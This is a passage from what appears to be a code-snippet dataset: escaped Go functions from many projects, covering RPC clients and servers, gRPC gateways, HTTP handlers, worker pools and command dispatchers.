\"handlers.NewGeosearch\")\n\t}\n\n\tvar rpcServer = grpc.NewServer(\n\t\tgrpc.StatsHandler(&ocgrpc.ServerHandler{\n\t\t\tStartOptions: trace.StartOptions{\n\t\t\t\tSampler: trace.AlwaysSample(),\n\t\t\t},\n\t\t}))\n\n\tpb.RegisterStorageServer(rpcServer, s)\n\n\t// log\n\treturn rpcServer.Serve(lis)\n}", "func caller(msgType int) MyReply {\n\targs := MyArgs{}\n\targs.MessageType = msgType\n\treply := MyReply{}\n\tcall(\"Master.Handler\", &args, &reply)\n\n\treturn reply\n}", "func main() {\n\n\thandleRequests()\n}", "func (conn *Connection) RPCall(funcName string, args interface{}, result interface{}) {\n\tconn.client.Call(funcName, args, result)\n\tconn.wg.Done()\n}", "func (client *Client) Do(funcname string, data []byte, flag byte) (handle string, err error) {\n var datatype uint32\n if flag & JOB_LOW == JOB_LOW {\n if flag & JOB_BG == JOB_BG {\n datatype = common.SUBMIT_JOB_LOW_BG\n } else {\n datatype = common.SUBMIT_JOB_LOW\n }\n } else if flag & JOB_HIGH == JOB_HIGH {\n if flag & JOB_BG == JOB_BG {\n datatype = common.SUBMIT_JOB_HIGH_BG\n } else {\n datatype = common.SUBMIT_JOB_HIGH\n }\n } else if flag & JOB_BG == JOB_BG {\n datatype = common.SUBMIT_JOB_BG\n } else {\n datatype = common.SUBMIT_JOB\n }\n\n uid := strconv.Itoa(int(client.ai.Id()))\n l := len(funcname) + len(uid) + len(data) + 2\n rel := make([]byte, 0, l)\n rel = append(rel, []byte(funcname)...) // len(funcname)\n rel = append(rel, '\\x00') // 1 Byte\n rel = append(rel, []byte(uid)...) // len(uid)\n rel = append(rel, '\\x00') // 1 Byte\n rel = append(rel, data...) // len(data)\n client.writeJob(newJob(common.REQ, datatype, rel))\n // Waiting for JOB_CREATED\n select {\n case job := <-client.jobCreated:\n return string(job.Data), nil\n case <-time.After(client.TimeOut):\n return \"\", common.ErrJobTimeOut\n }\n return\n}", "func worker() {\n\tworker, err := zmq4.NewSocket(zmq4.DEALER)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tdefer worker.Close()\n\tworker.Connect(\"inproc://backend\")\n\n\tfor {\n\t\tmsg, err := worker.RecvMessage(0)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\tid, content := pop(msg)\n\n\t\treplies := rand.Intn(5)\n\t\tfor reply := 0; reply < replies; reply++ {\n\t\t\ttime.Sleep(time.Duration(rand.Intn(1000)+1) * time.Millisecond)\n\t\t\tworker.SendMessage(id, content)\n\t\t}\n\t}\n}", "func mainHandler(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\tw.Header().Set(\"Access-Control-Allow-Credentials\", \"true\")\n\tw.Header().Set(\"Access-Control-Allow-Headers\", \"Content-Type\")\n\tw.Header().Set(\"Access-Control-Allow-Methods\", \"GET, POST, HEAD\")\n\n\tif r.Method == \"POST\" {\n\t\tvar req dlRequest\n\t\tif err := json.NewDecoder(r.Body).Decode(&req); err != nil {\n\t\t\tlog.Println(err)\n\t\t\thttp.Error(w, \"bad request\", http.StatusBadRequest)\n\t\t\treturn\n\t\t}\n\t\t// add to queue\n\t\tgo func(qreq *dlRequest) {\n\t\t\tm3u8.DlChan <- &m3u8.WJob{Type: m3u8.ListDL, URL: req.Url, DestPath: req.Path, Filename: req.Filename}\n\t\t}(&req)\n\t\tres := response{req.Url, req.Filename, \"Added to the queue\"}\n\t\tjson.NewEncoder(w).Encode(res)\n\t\treturn\n\t}\n}", "func main() {\n\tgwMux := runtime.NewServeMux()\n\tendPoint := \"localhost:8081\"\n\topt := []grpc.DialOption{grpc.WithTransportCredentials(helper.GetClientCreds())}\n\t// prod\n\tif err := pbfiles.RegisterProdServiceHandlerFromEndpoint(context.Background(), gwMux, endPoint, opt); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\t// order\n\tif err := pbfiles.RegisterOrderServiceHandlerFromEndpoint(context.Background(), gwMux, endPoint, opt); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\thttpServer := &http.Server{\n\t\tAddr: \":8080\",\n\t\tHandler: gwMux,\n\t}\n\n\tif err := httpServer.ListenAndServe(); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func main() {\n initApplicationConfiguration()\n runtime.GOMAXPROCS(2) // in order for the rpc and http servers to work in parallel\n\n go servers.StartRPCServer()\n servers.StartHTTPServer()\n}", "func call(rpcname string, args interface{}, reply interface{}) bool {\n\t// c, err := rpc.DialHTTP(\"tcp\", \"127.0.0.1\"+\":1234\")\n\tsockname := masterSock()\n\tc, err := rpc.DialHTTP(\"unix\", sockname)\n\tif err != nil {\n\t\tlog.Fatal(\"dialing:\", err)\n\t}\n\tdefer c.Close()\n\t//远程调用Master.Example(args, reply)\n\terr = c.Call(rpcname, args, reply)\n\tif err == nil {\n\t\treturn true\n\t}\n\tfmt.Println(err)\n\treturn false\n}", "func (s *Server) RunRPC(ctx context.Context, wg *sync.WaitGroup) error {\n\twg.Add(1)\n\n\tl, err := net.Listen(\"tcp\", s.GRPCListen)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsrvr := grpc.NewServer()\n\tpb.RegisterRegistryServer(srvr, s)\n\n\t// Shutdown procedure.\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tlog.Println(\"Shutting down gRPC listener\")\n\n\t\tsrvr.GracefulStop()\n\n\t\tif err := l.Close(); err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\twg.Done()\n\t}()\n\n\t// Background the listener.\n\tgo func() {\n\t\tlog.Printf(\"gRPC up: %s\\n\", s.GRPCListen)\n\t\tif err := srvr.Serve(l); err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\t}()\n\n\treturn nil\n}", "func main() {\n handleRequests()\n}", "func Handler(ctx context.Context) (response Response, err error) {\n\n\tres, err := Worker()\n\tif err != nil {\n\t\treturn\n\t}\n\n\tjsonRes, err := json.Marshal(res)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tresponse = Response{\n\t\tStatusCode: 200,\n\t\tIsBase64Encoded: false,\n\t\tBody: string(jsonRes),\n\t\tHeaders: map[string]string{\n\t\t\t\"Content-Type\": \"application/json\",\n\t\t},\n\t}\n\n\treturn\n}", "func listenRPC(app *core.App, config standaloneConfig) error {\n\t// Initialize the JSON RPC WebSocket server (but don't start it yet).\n\trpcAddr := fmt.Sprintf(\":%d\", config.RPCPort)\n\trpcHandler := &rpcHandler{\n\t\tapp: app,\n\t}\n\trpcServer, err := rpc.NewServer(rpcAddr, rpcHandler)\n\tif err != nil {\n\t\treturn nil\n\t}\n\tgo func() {\n\t\t// Wait for the server to start listening and select an address.\n\t\tfor rpcServer.Addr() == nil {\n\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t}\n\t\tlog.WithField(\"address\", rpcServer.Addr().String()).Info(\"started RPC server\")\n\t}()\n\treturn rpcServer.Listen()\n}", "func fire(worker string, rpcname string, args interface{}, reply interface{}, group *sync.WaitGroup, registerChan chan string) {\n\tres := call(worker, rpcname, args, reply)\n\tif res {\n\t\tgroup.Done()\n\t\tregisterChan <- worker\n\t} else {\n\t\tworker := <- registerChan\n\t\tfire(worker, rpcname, args, reply, group, registerChan)\n\t}\n}", "func CallRpc(addr string, rid uint16, sendFun, recvFun func(*common.NetPack)) {\n\tbuf := common.NewNetPackCap(64)\n\tbuf.SetOpCode(rid)\n\tsendFun(buf)\n\tb := PostReq(addr+\"client_rpc\", buf.DataPtr)\n\tif recvFun != nil {\n\t\tb2 := common.Decompress(b)\n\t\trecvFun(common.NewNetPack(b2))\n\t}\n}", "func main() {\n\tHandleRequests( )\n}", "func setUpRPC(nodeRPC string) {\n\trpcServ := new(Service)\n\trpc.Register(rpcServ)\n\trpcAddr, err := net.ResolveTCPAddr(\"tcp\", nodeRPC)\n\tif err != nil {\n\t\tlog.Fatal(\"listen error:\", err)\n\t}\n\tl, e := net.ListenTCP(consts.TransProtocol, rpcAddr)\n\tif e != nil {\n\t\tlog.Fatal(\"listen error:\", e)\n\t}\n\tfor i := 0; i >= 0; i++ {\n\t\tconn, _ := l.AcceptTCP()\n\t\tcolorprint.Alert(\"=========================================================================================\")\n\t\tcolorprint.Debug(\"REQ \" + strconv.Itoa(i) + \": ESTABLISHING RPC REQUEST CONNECTION WITH \" + conn.LocalAddr().String())\n\t\tgo rpc.ServeConn(conn)\n\t\tcolorprint.Blue(\"REQ \" + strconv.Itoa(i) + \": Request Served\")\n\t\tcolorprint.Alert(\"=========================================================================================\")\n\t\tdefer conn.Close()\n\t}\n\tl.Close()\n\n\t// rpcServ := new(FTService)\n\t// rpc.Register(rpcServ)\n\t// rpcAddr, err := net.ResolveTCPAddr(\"tcp\", nodeRPC)\n\t// if err != nil {\n\t// \tlog.Fatal(\"listen error:\", err)\n\t// }\n\t// l, e := net.ListenTCP(consts.TransProtocol, rpcAddr)\n\t// if e != nil {\n\t// \tlog.Fatal(\"listen error:\", e)\n\t// }\n\t// for i := 0; i >= 0; i++ {\n\t// \tconn, _ := l.AcceptTCP()\n\t// \tcolorprint.Alert(\"=========================================================================================\")\n\t// \tcolorprint.Debug(\"REQ \" + strconv.Itoa(i) + \": ESTABLISHING RPC REQUEST CONNECTION WITH \" + conn.LocalAddr().String())\n\t// \trpc.ServeConn(conn)\n\t// \tcolorprint.Blue(\"REQ \" + strconv.Itoa(i) + \": Request Served\")\n\t// \tcolorprint.Alert(\"=========================================================================================\")\n\t// \t//defer conn.Close()\n\t// }\n\t// l.Close()\n\n}", "func init(){\n\tskeleton.RegisterChanRPC(reflect.TypeOf(&msg.Hello{}), handleHello)\n}", "func main() {\n\tfmt.Println(\"net/rpc Arith server\")\n\tarith := new(nrpc.Arith) // nrpc from import statement // HL\n\trpc.Register(arith)\n\trpc.HandleHTTP()\n\tlis, err := net.Listen(\"tcp\", \":1234\")\n\tif err != nil {\n\t\tlog.Fatalf(\"unable to listen on port 1234: %v\", err)\n\t}\n\n\tgo http.Serve(lis, nil)\n\tselect {} // wait forever\n}", "func (r *rpcClientService) Call(serviceMethod string, args interface{},\n reply interface{}) error {\n\n if r == nil {\n return fmt.Errorf(\"error in rpc: client is nil\")\n }\n if r.rpcCh == nil {\n return fmt.Errorf(\"error in rpc client setup: channel is nil\")\n }\n buf, errJSON := json.Marshal(args)\n if errJSON != nil {\n glog.Error(\"error in marshaling args:: \", errJSON)\n return fmt.Errorf(\"error in marshaling args:: %v\", errJSON)\n }\n\n replyCh := make(chan *httpRPCRsp)\n state := sendRPCState{Method: serviceMethod, Args: buf, ReplyCh: replyCh}\n\n // send it on the rpc channel to the startClient loop\n glog.V(2).Info(\"sending rpc on channel: \", serviceMethod)\n\n select {\n case r.rpcCh <- &state:\n glog.V(2).Info(\"queued rpc call\")\n case <-r.stopCh:\n glog.V(2).Info(\"abandoning rpc call\")\n return ErrClient\n }\n\n // Now block on the response channel. Timeouts are implemented per request\n // in the client so we do not need to check for timeouts here.\n var rsp *httpRPCRsp\n select {\n case rsp = <-replyCh:\n glog.V(2).Infof(\"received response for rpc Call\")\n case <-r.stopCh:\n glog.V(2).Info(\"abandoning rpc call after sending\")\n return ErrDisconnect\n }\n\n // This can happen when stopCh gets closed due to connection errors.\n if rsp == nil {\n glog.Error(\"error in rpc response\")\n reply = nil\n return ErrDisconnect\n }\n if rsp.Status != nil {\n return rsp.Status\n }\n glog.V(1).Infof(\"rpc response succeeded with size: %d\", len(rsp.Reply))\n glog.V(3).Infof(\"rpc response reply: %+v, size: %d\", rsp.Reply,\n len(rsp.Reply))\n // success, let's unmarshal\n errRsp := json.Unmarshal(rsp.Reply, reply)\n if errRsp != nil {\n glog.Error(\"error unmarshaling RPC reply: \", errRsp)\n return errRsp\n }\n return nil\n}", "func (c *Connection) Worker() {\n\n\tfor {\n\t\tselect {\n\t\tcase _ = <-c.workerctx.Done():\n\t\t\treturn\n\t\tcase inData := <-c.In:\n\t\t\theader, _ := wire.GetHeader(inData)\n\n\t\t\tif header.CmdType == wire.CMD_EXIT {\n\t\t\t\tos.Exit(0)\n\t\t\t}\n\n\t\t\tlogg.Debug(\"processing server cmd\")\n\n\t\t\tcmdFunc, ok := cmd.CommandBuffer[header.CmdType]\n\t\t\tif !ok {\n\t\t\t\tlogg.Log(\"Command not implemented\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tnewctx1, _ := context.WithCancel(c.workerctx)\n\t\t\tgo cmdFunc(inData, c.Out, newctx1)\n\t\t}\n\t}\n\n}", "func main() {\n\n\tif (len(os.Args) != 4 && len(os.Args) != 5) {\n\t\tErrorCommandArguments()\n\t\treturn\n\t}\n\n\tgrpcHostname := os.Args[1]\n\n\tgrpcPort := os.Args[2]\n\n\n\tc, conn := CreateGrpcConnection(grpcHostname, grpcPort)\n\tdefer conn.Close()\n\n\tmodeChoice := os.Args[3]\n\tvar response *grpc_health.Message\n\n\tvar err error \n\tswitch modeChoice {\n\n\tcase \"sayhello\":\n\t\tresponse, err = c.SayHello(context.Background(), &grpc_health.Message{Body: \"Hello From Client! I'll wait for your reply!!!\"})\n\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when calling SayHello or SayBonjour: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Response from server: %s\", response.Body)\n\t\n\tcase \"clusterhealth\":\n\t\tvar clusterinfo *grpc_health.ClusterInfo\n\t\tclusterinfo, err = c.GetClusterStatus(context.Background(), &grpc_health.Message{Body: \"Asking Cluster status\"})\n\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when calling GetClusterStatus: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Cluster name: %s\", clusterinfo.Name)\n\t\tlog.Printf(\"Cluster status: %s\", clusterinfo.Status)\n\t\tlog.Printf(\"Cluster nb nodes: %s\", clusterinfo.Nodes)\n\t\n\tcase \"indexhealth\":\n\t\tif (len(os.Args) != 5) {\n\t\t\tErrorCommandArguments()\n\t\t\treturn\n\t\t} \n\t\t\n\t\tindiceName := os.Args[4]\n\t\tvar indiceInfo *grpc_health.IndiceInfo\n\t\tindiceInfo, err = c.GetIndiceStatus(context.Background(), &grpc_health.IndiceName{Indicename: indiceName})\n\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when calling GetClusterStatus: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Response from server:\")\n\t\tlog.Printf(\"Indice name: %s\", indiceInfo.Indicename)\n\t\tlog.Printf(\"Indice status: %s\", indiceInfo.Status)\n\t\tlog.Printf(\"Indice health: %s\", indiceInfo.Health)\n\t\tlog.Printf(\"Indice uuid: %s\", indiceInfo.Uuid)\n\t\n\tcase \"listindices\":\n\t\tvar listIndices *grpc_health.ListIndices\n\t\tlistIndices, err = c.GetIndicesList(context.Background(), &grpc_health.Message{Body: \"Hello From Client! I'll wait for your reply!!!\"})\n\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when calling GetIndicesList: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Nb indices : %s\", listIndices.NbIndices)\n\n\t\tnbIndices, err := strconv.Atoi(listIndices.NbIndices)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when converting number of indices: %s\", err)\n\t\t}\n\n\t\tvar indiceInfo *grpc_health.IndiceInfo\n\t\tfor i := 0; i < nbIndices; i++ {\n\t\t\tindiceInfo = listIndices.Indicelist[i]\n\t\t\tlog.Printf(\"Index [ %s ] - Status : %s - Health : %s - Uuid : %s \", indiceInfo.Indicename, indiceInfo.Status, indiceInfo.Health, indiceInfo.Uuid)\n\t\t}\n\t\n\tcase \"createindex\":\n\t\tif (len(os.Args) != 5) {\n\t\t\tErrorCommandArguments()\n\t\t\treturn\n\t\t} \n\t\tindiceName := os.Args[4]\n\t\tresponse, err = c.CreateIndexInCluster(context.Background(), &grpc_health.IndiceName{Indicename: indiceName})\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Create index request response : %s\", err)\n\t\t}\n\t\tlog.Printf(\"Create index request succeeded. %s\", response.Body)\n\n\tcase \"deleteindex\":\n\t\tif (len(os.Args) != 5) {\n\t\t\tErrorCommandArguments()\n\t\t\treturn\n\t\t} \n\t\t\n\t\tindiceName := os.Args[4]\n\t\tresponse, err = c.DeleteIndexInCluster(context.Background(), &grpc_health.IndiceName{Indicename: indiceName})\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when deleting index in Cluster: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Delete index request response : %s\", response.Body)\n\t\n\tdefault:\n\t\tErrorCommandArguments()\n\t\treturn\n\n\t}\n\n}", "func main() {\n\tgoworker.Register(\"SampleAddJobClass\", addWorker)\n\n\tif err := goworker.Work(); err != nil {\n\t\tfmt.Println(\"Error:\", err)\n\t}\n\n}", "func main() {\n\texoRelay := helpers.ConnectExoRelay()\n\texoRelay.RegisterHandler(\"ping\", func(request exorelay.Request) {\n\t\terr := request.Reply(\"pong\", nil)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Failed to send reply: %v\", err)\n\t\t}\n\t})\n\texoRelay.RegisterHandler(\"complex ping\", func(request exorelay.Request) {\n\t\tsearchMessage, err := request.Send(\"search\", nil)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Failed to send search: %v\", err)\n\t\t}\n\t\tresultMessage, err := request.WaitForActivity(searchMessage.ActivityID, time.Second*5)\n\t\tif err != nil || resultMessage.Name != \"result\" {\n\t\t\t_, err = request.Send(\"complex ping error\", nil)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Printf(\"Failed to send complex ping error: %v\", err)\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\terr = request.Reply(\"complex pong\", resultMessage.Payload)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"Failed to send complex pong: %v\", err)\n\t\t}\n\t})\n\truntime.Goexit()\n}", "func rpc_call(reqMethod string, reqParam interface{}, ip string, port int) Node {\n\n\ttempClient, _ := jsonrpc.Dial(serverInfo1.Protocol, ip+\":\"+strconv.Itoa(port))\n\tdefer tempClient.Close()\n\tvar resp Node\n\terr := tempClient.Call(\"DICT3.\"+reqMethod, reqParam, &resp)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn Node{}\n\t}\n\treturn resp\n}", "func main() {\n\n\twait := make(chan struct{}, 0)\n\tRegisterCallback(\"ping\", pingCB())\n\tRegisterCallback(\"add\", addCB())\n\tRegisterErrorCallback(\"raiseError\", err)\n\tRegisterValue(\"wasmVal\", \"Hello World\")\n\n\t<-wait\n}", "func ExampleWorkers_basic() {\n\n\tworkerFn := func(ctx context.Context, inpRec interface{}, sender SenderFn, store WorkerStore) error {\n\t\tv, ok := inpRec.(string)\n\t\tif !ok {\n\t\t\treturn errors.New(\"incorrect input type\")\n\t\t}\n\t\t// do something with v\n\t\tres := strings.ToUpper(v)\n\n\t\t// send response\n\t\treturn sender(res)\n\t}\n\n\tp := New(8, workerFn) // create workers pool\n\tcursor, err := p.Go(context.Background())\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// send some records in\n\tgo func() {\n\t\tp.Submit(\"rec1\")\n\t\tp.Submit(\"rec2\")\n\t\tp.Submit(\"rec3\")\n\t\tp.Close() // all records sent\n\t}()\n\n\t// consume results\n\trecs, err := cursor.All(context.TODO())\n\tlog.Printf(\"%+v, %v\", recs, err)\n}", "func (s *Server) RPC(method string, reply interface{}) error {\n\tcodec := &inmemCodec{\n\t\tmethod: method,\n\t\treply: reply,\n\t}\n\tif err := s.rpcServer.ServeRequest(codec); err != nil {\n\t\treturn err\n\t}\n\treturn codec.err\n}", "func main() {\n\tcalculix := serverCalculix.NewCalculix()\n\terr := rpc.Register(calculix)\n\tif err != nil {\n\t\tfmt.Println(\"Cannot register the calculix\")\n\t\treturn\n\t}\n\trpc.HandleHTTP()\n\tl, e := net.Listen(\"tcp\", \":1234\")\n\tif e != nil {\n\t\tlog.Fatal(\"listen error:\", e)\n\t}\n\terr = http.Serve(l, nil)\n\tif err != nil {\n\t\tfmt.Println(\"Cannot serve the calculix\")\n\t\treturn\n\t}\n}", "func (c *Client) rpc(method, u string, req, resp interface{}) (*http.Response, error) {\n\tvar r io.Reader\n\tvar contentType string\n\tswitch req := req.(type) {\n\tcase nil:\n\tcase io.Reader:\n\t\tr = req\n\tcase url.Values:\n\t\tr = strings.NewReader(req.Encode())\n\t\tcontentType = \"application/x-www-form-urlencoded\"\n\tdefault:\n\t\tb, err := json.Marshal(req)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tr = bytes.NewReader(b)\n\t\tcontentType = \"application/json\"\n\t}\n\n\threq, err := http.NewRequest(method, u, r)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif contentType != \"\" {\n\t\threq.Header.Set(\"Content-Type\", contentType)\n\t}\n\n\thresp, err := c.Do(hreq)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer hresp.Body.Close()\n\tif hresp.StatusCode/100 != 2 {\n\t\treturn nil, StatusError(hresp.StatusCode)\n\t}\n\tswitch body := resp.(type) {\n\tcase nil:\n\tcase io.Writer:\n\t\t_, err = io.Copy(body, hresp.Body)\n\tdefault:\n\t\terr = json.NewDecoder(hresp.Body).Decode(body)\n\t}\n\treturn hresp, err\n}", "func main() {\n\n\tcfg := webhook.LoadConfiguration(\"./config/\")\n\tqueue := webhook.NewMessagingQueue(cfg.QueueURI, cfg.ExchangeName, cfg.PoolConfig)\n\thook := webhook.NewWebHook(queue)\n\n\tiris.Post(\"/\" + cfg.EndpointName, hook.Process)\n\tgo cleanup(queue)\n\n\tiris.Listen(fmt.Sprintf(\":%d\", cfg.WebServerPort))\n\n}", "func main() {\n\tctx := context.Background()\n\tctx, cancel := context.WithCancel(ctx)\n\tdefer cancel()\n\n\t// New server multiplexer\n\tmux := runtime.NewServeMux()\n\topts := []grpc.DialOption{grpc.WithInsecure()}\n\n\t// Our gRPC host address\n\tconn := os.Getenv(\"SERVICE_ADDRESS\")\n\tapiAddress := os.Getenv(\"API_ADDRESS\")\n\n\tlog.Printf(\"Connecting to gRPC server on: %s\\n\", conn)\n\tlog.Printf(\"Starting API on: %s\\n\", apiAddress)\n\n\t// Register the handler to an endpoint\n\terr := gw.RegisterUserServiceHandlerFromEndpoint(ctx, mux, conn, opts)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Return a server instance\n\thttp.ListenAndServe(apiAddress, mux)\n}", "func main() {\n\thttp.HandleFunc(\"/api/backend\", handler.HandleBackendCall)\n\thttp.HandleFunc(\"/api/schema\", handler.HandleSchemaCall)\n\thttp.HandleFunc(\"/api/redirect\", handler.HandleRedirectCall)\n\thttp.HandleFunc(\"/api/add\", handler.HandleAddCall)\n\tfmt.Println(\"Waiting...\")\n\thttp.ListenAndServe(\":8080\", nil)\n\n}", "func svcHandler()", "func (s *grpcServer) dispatcher(stream grpc.Stream, methodName string,\n\tgetState func() (request proto.Message, response proto.Message, requestAttrs *mixerpb.Attributes, responseAttrs *mixerpb.Attributes, result *rpc.Status),\n\tworker func(ctx context.Context, requestBag *attribute.MutableBag, responseBag *attribute.MutableBag,\n\t\trequest proto.Message, response proto.Message)) error {\n\n\t// tracks attribute state for this stream\n\ttracker := s.attrMgr.NewTracker()\n\tdefer tracker.Done()\n\n\t// used to serialize sending on the grpc stream, since the grpc stream is not multithread-safe\n\tsendLock := &sync.Mutex{}\n\n\troot, ctx := s.tracer.StartRootSpan(stream.Context(), methodName)\n\tdefer root.Finish()\n\n\t// ensure pending stuff is done before leaving\n\twg := sync.WaitGroup{}\n\tdefer wg.Wait()\n\n\tfor {\n\t\trequest, response, requestAttrs, responseAttrs, result := getState()\n\n\t\t// get a single message\n\t\terr := stream.RecvMsg(request)\n\t\tif err == io.EOF {\n\t\t\treturn nil\n\t\t} else if err != nil {\n\t\t\tglog.Errorf(\"Stream error %s\", err)\n\t\t\treturn err\n\t\t}\n\n\t\trequestBag, err := tracker.ApplyRequestAttributes(requestAttrs)\n\t\tif err != nil {\n\t\t\tmsg := \"Request could not be processed due to invalid 'attribute_update'.\"\n\t\t\tglog.Error(msg, \"\\n\", err)\n\t\t\tdetails := status.NewBadRequest(\"attribute_update\", err)\n\t\t\t*result = status.InvalidWithDetails(msg, details)\n\n\t\t\tsendLock.Lock()\n\t\t\terr = s.sendMsg(stream, response)\n\t\t\tsendLock.Unlock()\n\n\t\t\tif err != nil {\n\t\t\t\tglog.Errorf(\"Unable to send gRPC response message: %v\", err)\n\t\t\t}\n\n\t\t\tcontinue\n\t\t}\n\n\t\t// throw the message into the work queue\n\t\twg.Add(1)\n\t\ts.gp.ScheduleWork(func() {\n\t\t\tspan, ctx2 := s.tracer.StartSpanFromContext(ctx, \"RequestProcessing\")\n\t\t\tspan.LogFields(log.Object(\"gRPC request\", request))\n\n\t\t\tresponseBag := attribute.GetMutableBag(nil)\n\n\t\t\t// do the actual work for the message\n\t\t\tworker(ctx2, requestBag, responseBag, request, response)\n\n\t\t\tsendLock.Lock()\n\t\t\ttracker.GetResponseAttributes(responseBag, responseAttrs)\n\t\t\terr := s.sendMsg(stream, response)\n\t\t\tsendLock.Unlock()\n\n\t\t\tif err != nil {\n\t\t\t\tglog.Errorf(\"Unable to send gRPC response message: %v\", err)\n\t\t\t}\n\n\t\t\trequestBag.Done()\n\t\t\tresponseBag.Done()\n\n\t\t\tspan.LogFields(log.Object(\"gRPC response\", response))\n\t\t\tspan.Finish()\n\n\t\t\twg.Done()\n\t\t})\n\t}\n}", "func inprocSend(rpcCmd common.RpcCmd, requestData interface{}, responseData interface{}) error {\n\tswitch rpcCmd {\n\tcase common.ERpcCmd.CopyJobPartOrder():\n\t\t*(responseData.(*common.CopyJobPartOrderResponse)) = ste.ExecuteNewCopyJobPartOrder(*requestData.(*common.CopyJobPartOrderRequest))\n\n\tcase common.ERpcCmd.ListJobs():\n\t\t*(responseData.(*common.ListJobsResponse)) = ste.ListJobs()\n\n\tcase common.ERpcCmd.ListJobSummary():\n\t\t*(responseData.(*common.ListJobSummaryResponse)) = ste.GetJobSummary(*requestData.(*common.JobID))\n\n\tcase common.ERpcCmd.ListSyncJobSummary():\n\t\t*(responseData.(*common.ListSyncJobSummaryResponse)) = ste.GetSyncJobSummary(*requestData.(*common.JobID))\n\n\tcase common.ERpcCmd.ListJobTransfers():\n\t\t*(responseData.(*common.ListJobTransfersResponse)) = ste.ListJobTransfers(requestData.(common.ListJobTransfersRequest))\n\n\tcase common.ERpcCmd.PauseJob():\n\t\tresponseData = ste.CancelPauseJobOrder(requestData.(common.JobID), common.EJobStatus.Paused())\n\n\tcase common.ERpcCmd.CancelJob():\n\t\t*(responseData.(*common.CancelPauseResumeResponse)) = ste.CancelPauseJobOrder(requestData.(common.JobID), common.EJobStatus.Cancelled())\n\n\tcase common.ERpcCmd.ResumeJob():\n\t\t*(responseData.(*common.CancelPauseResumeResponse)) = ste.ResumeJobOrder(*requestData.(*common.ResumeJobRequest))\n\n\tcase common.ERpcCmd.GetJobFromTo():\n\t\t*(responseData.(*common.GetJobFromToResponse)) = ste.GetJobFromTo(*requestData.(*common.GetJobFromToRequest))\n\n\tdefault:\n\t\tpanic(fmt.Errorf(\"Unrecognized RpcCmd: %q\", rpcCmd.String()))\n\t}\n\treturn nil\n}", "func (c *MainChannelCC) Invoke(stub shim.ChaincodeStubInterface) pb.Response {\n funcName, args := stub.GetFunctionAndParameters()\n\n switch funcName {\n // 任务上传\n case \"requestUpload\":\n return requestUpload(stub, args)\n // 查询任务\n case \"requestQuery\":\n return requestQuery(stub, args)\n // 查询全部任务\n case \"requestQueryArr\":\n return requestQueryArr(stub, args)\n // 难度值上传\n case \"difficultyUpload\":\n return difficultyUpload(stub, args)\n // 难度值查询\n case \"difficultyQuery\":\n return difficultyQuery(stub, args)\n // 难度值统一查询\n case \"difficultyQueryArr\":\n return difficultyQueryArr(stub, args)\n // 判断胜利者\n case \"winnerUpload\":\n return winnerUpload(stub, args)\n // 查询胜利者\n case \"winnerQuery\":\n return winnerQuery(stub, args)\n // 查询全部胜利者\n case \"winnerQueryArr\":\n return winnerQueryArr(stub, args)\n // 子channel上传\n case \"subChannelUpload\":\n return subChannelUpload(stub, args)\n // 子channel查询\n case \"subChannelQuery\":\n return subChannelQuery(stub, args)\n // 数据上传\n case \"dataUpload\":\n return dataUpload(stub, args)\n // 查询数据\n case \"dataQuery\":\n return dataQuery(stub, args)\n // 数据统一查询\n case \"dataQueryArr\":\n return dataQueryArr(stub, args)\n // 奖励发放\n case \"rewardsUpload\":\n return rewardsUpload(stub, args)\n // 奖励获取\n case \"rewardsReceive\":\n return rewardsReceive(stub, args)\n }\n\n\treturn shim.Success(nil)\n}", "func (h *Handler) handle(method string, params *json.RawMessage) (res interface{}, err error) {\n\tstart := time.Now()\n\tlog.Debug(\"Received %s message\", method)\n\tdefer func() {\n\t\tif r := recover(); r != nil {\n\t\t\tlog.Error(\"Panic in handler for %s: %s\", method, r)\n\t\t\tlog.Debug(\"%s\\n%v\", r, string(debug.Stack()))\n\t\t\terr = &jsonrpc2.Error{\n\t\t\t\tCode: jsonrpc2.CodeInternalError,\n\t\t\t\tMessage: fmt.Sprintf(\"%s\", r),\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Debug(\"Handled %s message in %s\", method, time.Since(start))\n\t\t}\n\t}()\n\n\tswitch method {\n\tcase \"initialize\":\n\t\tinitializeParams := &lsp.InitializeParams{}\n\t\tif err := json.Unmarshal(*params, initializeParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.initialize(initializeParams)\n\tcase 